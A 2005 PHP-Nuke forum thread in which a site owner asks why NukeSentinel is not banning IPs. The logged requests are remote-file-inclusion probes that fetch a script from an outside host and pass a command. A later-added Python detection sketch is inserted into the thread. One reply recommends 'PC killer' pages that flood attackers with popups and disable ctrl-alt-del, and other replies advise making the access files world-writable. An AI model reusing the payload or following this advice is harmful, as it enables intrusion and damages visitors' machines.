Author |
Message |
Gabe
Regular


Joined: Oct 30, 2005
Posts: 62
|
Posted:
Fri Dec 23, 2005 4:13 pm |
|
Ok well I've been getting these abuse emails from sentinel 2.4.2 for about a week now, it happened like twice the first day, and hasn't happened since until today. I've gotten I think 2 or 3 abuse emails today from sentinel, here's two emails from today:
Quote: | Date & Time: 2005-12-23 15:11:52 CST GMT -0600
Blocked IP: 66.173.241.225
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: lwp-trivial/1.35
Query String: www.**********.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado
Get String: www.**********.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado
Post String: www.********.net/modules.php
Forwarded For: none
Client IP: none
Remote Address: 66.173.241.225
Remote Port: 38940
Request Method: GET
|
Quote: | Date & Time: 2005-12-23 11:50:33 CST GMT -0600
Blocked IP: 202.226.224.67
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: lwp-trivial/1.35
Query String: www.************.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado
Get String: www.************.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado
Post String: www.**********.net/modules.php
Forwarded For: none
Client IP: none
Remote Address: 202.226.224.67
Remote Port: 48527
Request Method: GET
|
Also I would like to mention that the IPs don't get banned on the "display blocked IPs" menu page in the sentinel admin. They don't get added there at all. I wanted to know why and I wanted to know if these really are attacks and what could happen if one doesn't get blocked?
Thanks. |
Last edited by Gabe on Fri Dec 23, 2005 5:20 pm; edited 1 time in total |
|
|
 |
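A detection sketch for the request pattern in the two abuse e-mails above (a URL passed as the `name` parameter of modules.php, a `cmd` parameter, and an lwp-trivial user agent), added here as an example; it is not part of the original thread and not NukeSentinel's own code. The sample requests, placeholder hosts, the `name`/`file` parameter set, the module-name pattern and the agent list are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed (user agent, request) pairs modelled on the abuse e-mails;
# site.example and remote.example are placeholder hosts.
SAMPLES = [
    ("lwp-trivial/1.35", "www.site.example/modules.php"
     "?name=http://remote.example/private/tool.dot?&cmd=cat bugado"),
    ("Mozilla/5.0", "www.site.example/modules.php?name=Forums&file=viewtopic&t=12"),
    ("Mozilla/5.0", "www.site.example/modules.php"
     "?name=HTTP%3A%2F%2Fremote.example%2Fx.txt"),
]

REMOTE_SCHEME = re.compile(r"\s*(?:https?|ftp)://", re.IGNORECASE)
MODULE_NAME = re.compile(r"[A-Za-z0-9_]+")        # assumed shape of a module name
INCLUDE_PARAMS = {"name", "file"}                 # assumed include-selecting params
SCRIPTED_AGENTS = ("lwp-trivial", "libwww-perl")  # assumed watch list


def is_safe_module_name(value):
    """Allowlist check: a module selector must be a plain identifier."""
    return MODULE_NAME.fullmatch(value) is not None


def rfi_indicators(user_agent, request):
    """Return the reasons a request looks like a remote-file-inclusion probe."""
    reasons = []
    _, _, query = request.partition("?")
    # parse_qsl percent-decodes values, so encoded schemes are caught too.
    params = parse_qsl(query, keep_blank_values=True)
    for key, value in params:
        if REMOTE_SCHEME.match(value):
            reasons.append(f"remote URL in parameter '{key}'")
        elif key in INCLUDE_PARAMS and not is_safe_module_name(value):
            reasons.append(f"invalid module selector in '{key}'")
    if any(key.lower() == "cmd" for key, _ in params):
        reasons.append("command parameter present")
    if user_agent.lower().startswith(SCRIPTED_AGENTS):
        reasons.append("scripted user agent")
    return reasons


if __name__ == "__main__":
    for agent, request in SAMPLES:
        print(rfi_indicators(agent, request) or "clean", "<-", request)
```

The remote-URL reason is the one that identifies the inclusion attempt; the command parameter and user agent are corroborating signals that are easy for a client to change.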
hitwalker
Sells PC To Pay For Divorce

Joined:
Posts: 5661
|
Posted:
Fri Dec 23, 2005 4:27 pm |
|
are your settings correct so they should be banned and not automatically flushed?
And this is btw a script kiddy attack, I already mailed the Belgium website. |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 4:34 pm |
|
hitwalker wrote: | are your settings correct so they should be banned and not automatically flushed?
And this is btw a script kiddy attack, I already mailed the Belgium website. |
I have it set to email, block, & default page
what do you mean you emailed the Belgium website? what site is that? |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 4:49 pm |
|
That's this site: http://www.sanicentrum.be
But they don't know anything about this...their server was probably vulnerable so ...
As for sentinel, I can't imagine it doesn't ban or add the ip....better check again..., especially all settings. |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:00 pm |
|
hitwalker wrote: | That's this site: http://www.sanicentrum.be
But they don't know anything about this...their server was probably vulnerable so ...
As for sentinel, I can't imagine it doesn't ban or add the ip....better check again..., especially all settings. |
I don't know what else to check, I have it set to admin, block, goto default page |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:01 pm |
|
Have you tried to attack yourself and see what happens? |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:02 pm |
|
hitwalker wrote: | Have you tried to attack yourself and see what happens? |
attack my own site? no |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:04 pm |
|
Well try it and see what happens....unbanning yourself is easy so no worries.. |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:07 pm |
|
I don't know how to attack my site, a week ago I clicked one of the urls in the sentinel abuse email and I got that ban message when I went to that url on my site, I could browse the rest of the site and I never got added to the banned ips |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:09 pm |
|
ok..message between...
can you edit your first post please and delete the website lines...before someone is going to abuse it... |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:19 pm |
|
ok found a nice injection, got banned but still could visit your site afterwards... |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:22 pm |
|
Ok I edited my post.
So what should I do? why isn't it banning you? |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:25 pm |
|
well I mean..take out the Belgium url too...
and are you sure you edited all files as specified in the install? |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:30 pm |
|
hitwalker wrote: | well I mean..take out the Belgium url too...
and are you sure you edited all files as specified in the install? |
yea I am sure |
|
|
|
 |
hitwalker

|
Posted:
Fri Dec 23, 2005 5:47 pm |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 5:54 pm |
|
I'll look at it in a minute. did they find a fix for my problem? |
|
|
|
 |
Gabe

|
Posted:
Fri Dec 23, 2005 7:41 pm |
|
so am I supposed to enable that cgi auth, the sentinel readme doesn't even explain what it is or does. I think it might be time to remove sentinel. I don't even know the passwords that my other admins use to login so I'm not sure if I could do that admin auth whatever it is |
|
|
|
 |
Gabe

|
Posted:
Sat Dec 24, 2005 8:00 pm |
|
Well I set passwords for all the admins (do they need to know the passwords I set for them?) and I set them to protected. do their passwords need to be the same as the ones they use to log into the site?
next question is what is cgi auth and do I need to mess with it? also when type in the path get the .htaccess file in the sentinel admin it says it does not exist, what about a .staccess file? I have one but its named sample.staccess and I have a sample.htaccess |
|
|
|
 |
thebishop
Worker


Joined: Aug 30, 2005
Posts: 244
Location: Flying to close to the sun
|
Posted:
Sun Dec 25, 2005 6:33 pm |
|
gabe, you should rename the sample.staccess to just .staccess and make sure all your admin usernames and encrypted passwords are in it.
as for your .htaccess, it should be in the root directory of your nuke installation and chmod the file permissions to 666. some control panels seem to change the chmod setting, so make sure you use an ftp client to change the permissions on the .htaccess before uploading it to your nuke root folder so it will stay at 666.
then make sure you go here and download the pc killer and ip to country files. the ip to country will let you block certain countries from even coming to your site. the countries I have blocked are Russia, Brazil, Netherlands and Indonesia. you may want to block Belgium.
the PC killer templates will block and forward the offender to a page that will give them a mass of popups and disable the ctrl ALT del keys so they will have to reboot their PC. this is a headache for script kiddies to keep having to deal with time and time again. especially if they have to renew their ip too.
after you upload the PC killer templates go to your NS administration panel/blocker settings and in ADMIN, AUTHOR, UNION, CLIKE & FILTERS,
type in the Forward to: box. http://yourURLhere/abuse/abuse.html.
where "yoururlhere" will be the name of your site.
that url will be the url that script kiddie gets forwarded to.
make sure to tick the write to .htaccess box. and under the Activate box, choose email, block & Forward. this blocks the ip, emails you, and forwards the attacker to the abuse.html file that will then give them a headache.
on the NS administrations page, make sure you have the correct paths to both of the .htaccess & .staccess files on your site.
remember the .staccess file holds your admins information username PW etc. the .htaccess file controls who has access to it and your site by denying them or allowing them access.
this is what you should have in your .htaccess file.
{EDIT}
if you respond to this post I'll get an email, so if you have any other questions, just post back. I hope this helps ya man. |
Last edited by thebishop on Tue Dec 27, 2005 6:28 pm; edited 1 time in total |
|
|
 |
Gabe

|
Posted:
Sun Dec 25, 2005 8:31 pm |
|
thebishop wrote: | gabe, you should rename the sample.staccess to just .staccess and make sure all your admin usernames and encrypted passwords are in it.
as for your .htaccess, it should be in the root directory of your nuke installation and chmod the file permissions to 666. some control panels seem to change the chmod setting, so make sure you use an ftp client to change the permissions on the .htaccess before uploading it to your nuke root folder so it will stay at 666.
then make sure you go here and download the pc killer and ip to country files. the ip to country will let you block certain countries from even coming to your site. the countries I have blocked are Russia, Brazil, Netherlands and Indonesia. you may want to block Belgium.
the PC killer templates will block and forward the offender to a page that will give them a mass of popups and disable the ctrl ALT del keys so they will have to reboot their PC. this is a headache for script kiddies to keep having to deal with time and time again. especially if they have to renew their ip too.
after you upload the PC killer templates go to your NS administration panel/blocker settings and in ADMIN, AUTHOR, UNION, CLIKE & FILTERS,
type in the Forward to: box. http://yourURLhere/abuse/abuse.html.
where "yoururlhere" will be the name of your site.
that url will be the url that script kiddie gets forwarded to.
make sure to tick the write to .htaccess box. and under the Activate box, choose email, block & Forward. this blocks the ip, emails you, and forwards the attacker to the abuse.html file that will then give them a headache.
on the NS administrations page, make sure you have the correct paths to both of the .htaccess & .staccess files on your site.
remember the .staccess file holds your admins information username PW etc. the .htaccess file controls who has access to it and your site by denying them or allowing them access.
this is what you should have in your .htaccess file.
[CODE]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
deny from all
</FilesMatch>
<Limit GET POST>
Order Allow,Deny
Allow from all
</Limit>
[/CODE]
if you respond to this post I'll get an email, so if you have any other questions, just post back. I hope this helps ya man. |
yea it helps a lot, I'll try and do all this in an hour or two. thanks
ok, well I started to do the first thing but I already have a .htaccess file, should I delete it then change my sample.htaccess and sample.staccess and remove the "sample" from the two files? |
|
|
|
 |
thebishop

|
Posted:
Sun Dec 25, 2005 9:24 pm |
|
I believe the sample.staccess file is blank with no sample code.
I don't use the sample code from the sample.htaccess file so I don't believe you will need that either. what version of nuke are you running.
no you don't have to delete the .htaccess file you already have, you can just use that one. just make sure that code I posted is in it.
also make sure its chmod is set to 666.
if you're using APACHE make sure that there's one empty line space at the bottom of the .htaccess file so it can be written to by NS.
if for some reason you get locked out of your site while doing this, go to your phpMyAdmin and then to nsnst_blocked_ips and remove your ip address. then try to get back to your site. you should be fine.
for the sample.staccess file, just rename it .staccess and it should store all of your admins usernames and passwords in there.
post back if you need any more info. or contact me by MSN. |
Last edited by thebishop on Sun Dec 25, 2005 9:32 pm; edited 1 time in total |
|
|
 |
Gabe

|
Posted:
Sun Dec 25, 2005 9:31 pm |
|
thebishop wrote: | no you don't have to delete the .htaccess file you already have, you can just use that one. just make sure that code I posted is in it.
also make sure its chmod is set to 666. and that there's one empty line space at the bottom of the .htaccess file so it can be written to by NS.
if for some reason you get locked out of your site while doing this, go to your phpMyAdmin and then to nsnst_blocked_ips and remove your ip address. then try to get back to your site. you should be fine.
for the sample.staccess file, just rename it .staccess and it should store all of your admins usernames and passwords in there.
post back if you need any more info. or contact me by MSN. |
I'm not sure how to set the file to chmod 666 |
|
|
|
 |
thebishop

|
Posted:
Sun Dec 25, 2005 9:34 pm |
|
in your FTP client you should have a place to change the file permissions.
it's best to do it there. if you can't find it or don't have it then you'll have an option somewhere on your web panel.
what web control panel are you using. |
|
|
|
 |
Gabe

|
Posted:
Sun Dec 25, 2005 9:35 pm |
|
thebishop wrote: | in your FTP client you should have a place to change the file permissions.
it's best to do it there. if you can't find it or don't have it then you'll have an option somewhere on your web panel.
what web control panel are you using. |
I am using cPanel, and my ftp client is ws ftp pro
edit:: I think I figured it out, I right clicked on the file through my ftp client and went to properties and then it has a numeric value field. it was set to I think 644 and I just set it to 666, hopefully I am changing the right thing, does staccess also need to be set to 666? |
|
|
|
 |
thebishop

|
Posted:
Sun Dec 25, 2005 9:47 pm |
|
if you open up wsftp pro and right click on the file you want to change permissions for, you should be given the option to change its attributes.
e.g. 666, 644, 755 and so on. some ftp software calls this a custom command instead of change file permissions.
yes both of the access files need to be set to 666.
btw what version of nuke are you running. |
Last edited by thebishop on Sun Dec 25, 2005 9:51 pm; edited 1 time in total |
|
|
 |
|